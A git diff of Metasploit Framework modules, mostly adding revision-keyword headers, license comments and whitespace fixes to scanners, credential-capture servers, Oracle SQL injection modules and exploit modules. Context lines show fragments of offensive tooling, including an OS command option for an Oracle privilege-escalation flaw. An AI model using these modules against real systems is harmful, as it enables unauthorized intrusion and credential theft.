a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index f304ccf985..ea85179a95 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -5,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb index 15a549183d..3c89cfabb8 100644 --- a/modules/auxiliary/scanner/ftp/ftp_version.rb +++ b/modules/auxiliary/scanner/ftp/ftp_version.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -5,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb index 5edf41bfc8..caae9dadd6 100644 --- a/modules/auxiliary/scanner/http/cert.rb +++ b/modules/auxiliary/scanner/http/cert.rb @@ -1,3 +1,6 @@ +## +# $Id$ +## ## # This file is part of the Metasploit Framework and may be subject to @@ -6,11 +9,9 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'rex/socket/ssl_tcp' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/http/enum_delicious.rb b/modules/auxiliary/scanner/http/enum_delicious.rb index 9bb16c000a..fecb91eb49 100644 --- a/modules/auxiliary/scanner/http/enum_delicious.rb +++ b/modules/auxiliary/scanner/http/enum_delicious.rb @@ -9,7 +9,6 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'net/http' @@ -18,11 +17,14 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Pull Del.icio.us Links (URLs) for a domain', - 'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the - purpose of replaying during a web assessment. Finding unlinked and old pages. }, + 'Description' => %q{ + This module pulls and parses the URLs stored by Del.icio.us users for the + purpose of replaying during a web assessment. Finding unlinked and old pages. + }, 'Author' => [ 'Rob Fuller ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 7206 $')) + 'Version' => '$Revision$')) + register_options( [ OptString.new('DOMAIN', [ true, "Domain to request URLS for"]), diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index a8db75f847..d0da56def3 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary replaying during a web assessment. Finding unlinked and old pages. }, 'Author' => [ 'Rob Fuller ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 7206 $')) + 'Version' => '$Revision$')) register_options( [ OptString.new('DOMAIN', [ true, "Domain to request URLS for"]), diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 37086f51b2..2b15fb64b9 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,16 +31,17 @@ class Metasploit3 < Msf::Auxiliary requires either Basic, Digest or NTLM authentication. }, 'Author' => [ 'et', 'patrick' ], + 'Version' => '$Revision$', 'License' => MSF_LICENSE, - 'References' => + 'References' => [ [ 'MSB', 'MS09-020' ], [ 'CVE', '2009-1535' ], [ 'CVE', '2009-1122' ], [ 'OSVDB', '54555' ], [ 'BID', '34993' ], - ], - 'Version' => '$Revision$')) + ] + )) register_options( [ diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb index 7873322d4e..27df86ee29 100644 --- a/modules/auxiliary/scanner/http/options.rb +++ b/modules/auxiliary/scanner/http/options.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -5,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first @@ -26,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['CG'], 'License' => MSF_LICENSE ) - end def run_host(target_host) diff --git a/modules/auxiliary/scanner/http/sqlmap.rb b/modules/auxiliary/scanner/http/sqlmap.rb index c6d8e1e34b..11bb13273e 100644 --- a/modules/auxiliary/scanner/http/sqlmap.rb +++ b/modules/auxiliary/scanner/http/sqlmap.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -7,12 +17,11 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::WMAPScanUniqueQuery include Msf::Auxiliary::Scanner - def initialize(info = {}) super(update_info(info, 'Name' => 'SQLMAP SQL Injection External Module', 'Description' => %q{ - This module launch a sqlmap session. + This module launch a sqlmap session. sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index 71aa0b61e7..1e7a438a62 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -1,3 +1,6 @@ +## +# $Id$ +## ## # This file is part of the Metasploit Framework and may be subject to @@ -6,7 +9,6 @@ # http://metasploit.com/framework/ ## - require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index 0de0fc429c..8160356826 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -5,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first @@ -21,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Subversion Scanner', - 'Version' => '$Revision: 6485 $', + 'Version' => '$Revision$', 'Description' => 'Detect subversion directories and files and analize its content. Only SVN Version > 7 supported', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index 7eb6cf7700..e8ead27afc 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first @@ -25,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP trace.axd Content Scanner', - 'Version' => '$Revision: 7605 $', + 'Version' => '$Revision$', 'Description' => 'Detect trace.axd files and analize its content', 'Author' => ['c4an'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb index 009fec1bbd..f6f5a66dd7 100644 --- a/modules/auxiliary/scanner/http/web_vulndb.rb +++ b/modules/auxiliary/scanner/http/web_vulndb.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -8,7 +12,6 @@ require 'rex/proto/http' require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -24,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'et' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision: 7629 $')) + 'Version' => '$Revision$')) register_options( [ diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index fd624f1715..c67a6d315c 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb +++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index 74d0d1c8ad..db906d8020 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC @@ -22,11 +21,12 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'SunRPC Portmap Program Enumerator', 'Description' => %q{ - This module calls the target portmap service and enumerates all + This module calls the target portmap service and enumerates all program entries and their running port numbers. }, - 'Author' => [''], - 'References' => + 'Author' => [''], + 'Version' => '$Revision$', + 'References' => [ ['URL', 'http://www.ietf.org/rfc/rfc1057.txt'], ], @@ -83,4 +83,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index f511cbfd3a..9c12656d51 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -18,15 +18,15 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - def initialize super( 'Name' => 'NFS Mount Scanner', 'Description' => %q{ This module scans NFS mounts and their permissions. }, - 'Author' => [''], - 'References' => + 'Author' => [''], + 'Version' => '$Revision$', + 'References' => [ ['CVE', '1999-0170'], ['URL', 'http://www.ietf.org/rfc/rfc1094.txt'] diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index b5705903cf..5c6b9a7911 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary This module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigan s default oracle password list. }, - 'Version' => '$Revision: 6876 $', + 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index 523d83cc1e..8c83f578bc 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index 28ab0abab5..565d3e21c6 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb index dd445234db..96ebf3c426 100644 --- a/modules/auxiliary/scanner/telnet/telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/telnet_version.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -5,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Telnet diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index 8287b1e511..c7493733a6 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -48,9 +48,9 @@ class Metasploit3 < Msf::Auxiliary # X11.00 Null Auth Connect sock.put("\x6c\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00") response = sock.get_once - + disconnect - + if(response) success = response[0,1].unpack('C')[0] end @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary else # X can return a reason for auth failure but we don't really care for this end - + rescue ::Rex::ConnectionError rescue ::Errno::EPIPE end diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 10ba44365d..3dc1ee70f1 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -9,23 +9,20 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - def initialize super( 'Name' => 'Authentication Capture: FTP', 'Version' => '$Revision$', 'Description' => %q{ - This module provides a fake FTP service that - is designed to capture authentication credentials. + This module provides a fake FTP service that + is designed to capture authentication credentials. }, 'Author' => ['ddz', 'hdm'], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index cb4f9bd3f0..158df2e80f 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -33,6 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ 'Ryan Linn ', ], + 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'Actions' => [ @@ -49,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('PWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ]) ], self.class) + register_advanced_options([ OptString.new('DOMAIN', [ false, "The default domain to use for NTLM authentication", "DOMAIN"]), OptString.new('SERVER', [ false, "The default server to use for NTLM authentication", "SERVER"]), diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb index bb783735a1..65b8a624e7 100644 --- a/modules/auxiliary/server/capture/telnet.rb +++ b/modules/auxiliary/server/capture/telnet.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' # Fake Telnet Service - Kris Katterjohn 09/28/2008 diff --git a/modules/auxiliary/server/file_autopwn.rb b/modules/auxiliary/server/file_autopwn.rb index 1ae874df54..f8100b1391 100644 --- a/modules/auxiliary/server/file_autopwn.rb +++ b/modules/auxiliary/server/file_autopwn.rb @@ -9,11 +9,9 @@ # http://metasploit.com/framework/ ## - require 'msf/core' #require 'rex/exploitation/javascriptosdetect' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML @@ -21,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'File Format Exploit Generator', - 'Version' => '$Revision: 8210 $', + 'Version' => '$Revision$', 'Description' => %q{ This module generates a combination of File format exploits and make them available to a client. 94.7% Based on browser autopwn by egypt. }, diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 9a1a44f530..6b4e5baebd 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -14,7 +14,6 @@ require 'net/dns' require 'racket' require 'resolv' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index ba844c6e83..fa5fa6b9e3 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -1,12 +1,22 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'net/dns' require 'resolv' - class Metasploit3 < Msf::Auxiliary def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'DNS Lookup Result Comparison', 'Description' => %q{ This module can be used to determine differences @@ -22,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jul 21 2008' )) - + register_options( [ OptAddress.new('BASEDNS', [ true, 'The DNS cache server to use as a baseline', '4.2.2.3' ]), @@ -30,13 +40,13 @@ class Metasploit3 < Msf::Auxiliary OptString.new('NAMES', [ true, 'The list of host names that should be tested (comma separated)', 'www.google.com,www.yahoo.com,www.msn.com']), OptBool.new('CHECK_AUTHORITY', [ false, 'Set this to true to verify authority records', false ]), OptBool.new('CHECK_ADDITIONAL', [ false, 'Set this to true to verify additional records', false ]), - + ], self.class) - + end - - - def run + + + def run base_addr = datastore['BASEDNS'] targ_addr = datastore['TARGDNS'] check_ar = datastore['CHECK_ADDITIONAL'] @@ -44,27 +54,27 @@ class Metasploit3 < Msf::Auxiliary names = datastore['NAMES'].split(",").map {|c| c.strip } recurse = true results = {} - + print_status("Comparing results between #{base_addr} and #{targ_addr}...") base_sock = Rex::Socket.create_udp( 'PeerHost' => base_addr, 'PeerPort' => 53 ) - + targ_sock = Rex::Socket.create_udp( 'PeerHost' => targ_addr, 'PeerPort' => 53 - ) + ) names.each do |entry| entry.strip! next if (entry.length == 0) - + req = Resolv::DNS::Message.new req.add_question(entry, Resolv::DNS::Resource::IN::A) req.rd = recurse ? 1 : 0 - + buf = req.encode print_status("Querying servers for #{entry}...") base_sock.put(buf) @@ -72,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary base_res, base_saddr = base_sock.recvfrom(65535, 3.0) targ_res, targ_saddr = targ_sock.recvfrom(65535, 3.0) - + if !(base_res and targ_res and base_res.length > 0 and targ_res.length > 0) print_status(" Error: The baseline server did not respond to our request.") if ! (base_res and base_res.length > 0) print_status(" Error: The target server did not respond to our request.") if ! (targ_res and targ_res.length > 0) @@ -81,14 +91,14 @@ class Metasploit3 < Msf::Auxiliary base_res = Resolv::DNS::Message.decode(base_res) targ_res = Resolv::DNS::Message.decode(targ_res) - + [base_res, targ_res].each do |res| hkey = (res == base_res) ? :base : :targ - + rrset = res.answer rrset += res.authority if check_aa rrset += res.additional if check_ar - + (rrset).each do |ref| name,ttl,data = ref @@ -104,7 +114,7 @@ class Metasploit3 < Msf::Auxiliary when 'TXT' data = data.strings.join when 'CNAME' - data = data.name.to_s + data = data.name.to_s else data = anst end @@ -116,20 +126,20 @@ class Metasploit3 < Msf::Auxiliary end end end - + [ base_sock, targ_sock ].each {|s| s.close } - - + + print_status("Analyzing results for #{results.keys.length} entries...") - + results.each_key do |entry| - + n_add = [] n_sub = [] - + # Look for additional entries in the target NS if(results[entry][:targ]) - results[entry][:targ].each_key do |rtype| + results[entry][:targ].each_key do |rtype| if(not results[entry][:base] or not results[entry][:base][rtype]) results[entry][:targ][rtype].sort.each do |ref| n_sub << (" + #{entry} #{rtype} #{ref}") @@ -137,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary end end end - + if (results[entry][:base]) results[entry][:base].each_key do |rtype| @@ -160,15 +170,15 @@ class Metasploit3 < Msf::Auxiliary if(not results[entry][:base][rtype].include?(ref)) n_add << (" + #{entry} #{rtype} #{ref}") end - end + end end end end - + n_sub.each {|s| print_status(s) } n_add.each {|s| print_status(s) } end end - -end \ No newline at end of file + +end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index cf877aad8d..4e09750443 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0870' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index 1fdb455775..c2a910a7b8 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision:$', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2081' ], diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index 26e7fbbb26..94237b40db 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,10 +19,9 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => ' DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution', 'Description' => %q{ - This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows + This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only) - }, 'Author' => [ 'sid[at]notsosecure.com' ], 'License' => MSF_LICENSE, @@ -30,10 +33,10 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Feb 1 2010')) - register_options( - [ - OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]), - ], self.class) + register_options( + [ + OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]), + ], self.class) end def run diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 7515161aab..154038f4c5 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -16,9 +20,8 @@ class Metasploit3 < Msf::Auxiliary 'Name' => ' DBMS_JVM_EXP_PERMS 11g R1/R2 OS Code Execution', 'Description' => %q{ This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows - any user with create session privilege to grant themselves java IO privileges. + any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. Works on 11g R1 and R2 (Windows only). - }, 'Author' => [ 'sid[at]notsosecure.com' ], 'License' => MSF_LICENSE, @@ -30,10 +33,10 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Feb 1 2010')) - register_options( - [ - OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]), - ], self.class) + register_options( + [ + OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]), + ], self.class) end def run diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb index 98bc10df53..54627b0795 100644 --- a/modules/encoders/x86/alpha_mixed.rb +++ b/modules/encoders/x86/alpha_mixed.rb @@ -9,13 +9,10 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'rex/encoder/alpha2/alpha_mixed' - class Metasploit3 < Msf::Encoder::Alphanum - Rank = LowRanking def initialize @@ -64,7 +61,7 @@ class Metasploit3 < Msf::Encoder::Alphanum buf + Rex::Encoder::Alpha2::AlphaMixed::gen_decoder(reg, off) end - + # # Configure SEH getpc code on Windows # @@ -73,7 +70,7 @@ class Metasploit3 < Msf::Encoder::Alphanum datastore['AllowWin32SEH'] = true end end - + # # Encodes a one byte block with the current index of the length of the # payload. @@ -89,4 +86,3 @@ class Metasploit3 < Msf::Encoder::Alphanum state.encoded += Rex::Encoder::Alpha2::AlphaMixed::add_terminator() end end - diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb index 38053c0858..915a389028 100644 --- a/modules/exploits/multi/fileformat/maple_maplet.rb +++ b/modules/exploits/multi/fileformat/maple_maplet.rb @@ -23,11 +23,11 @@ class Metasploit3 < Msf::Exploit::Remote This module harnesses Maple's ability to create files and execute commands automatically when opening a Maplet. All versions up to 13 are suspected vulnerable. Testing was conducted with version 13 on Windows. Standard security - settings prevent code from running in a normal maple worksheet without user + settings prevent code from running in a normal maple worksheet without user interaction, but those setting do not prevent code in a Maplet from running. In order for the payload to be executed, an attacker must convince someone to - open a specially modified .maplet file with Maple. By doing so, an attacker can + open a specially modified .maplet file with Maple. By doing so, an attacker can execute arbitrary code as the victim user. }, 'License' => MSF_LICENSE, @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote fname << ".exe" end fhandle = rand_text_alpha(3+rand(15)) - + #Write maple commands to create executable content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n" exe = binary.unpack('C*') diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index 47abb407de..2860734d81 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote specifiers, an attacker can corrupt memory and execute arbitrary code. }, 'Author' => [ 'jduck' ], + 'Version' => '$Revision$', 'References' => [ ['OSVDB', '11805'], diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index 35513fea08..91dab8d1e7 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -1,5 +1,5 @@ ## -# $Id: wireshark_lwres_getaddrbyname.rb 8364 2010-02-03 18:24:42Z jduck $ +# $Id$ ## ## @@ -9,7 +9,6 @@ # http://metasploit.com/framework/ ## - require 'msf/core' #require 'racket' @@ -48,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'redsand' # windows target/testing ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 8364 $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0304' ], diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index 6175d79191..427e3701c8 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb @@ -19,6 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow', + # Description? + # Author? + 'Version' => '$Revision$', 'Platform' => 'osx', 'References' => [ diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index 6ca9c96d60..b797cedafd 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -1,7 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index cbced37023..1597900b0e 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby bash telnet', } - }, + }, 'Platform' => [ 'unix', 'win', 'linux' ], 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], @@ -81,6 +81,6 @@ class Metasploit3 < Msf::Exploit::Remote req2 = send_request_raw({ 'uri' => datastore['URIOUT'], }, 25) - + end end diff --git 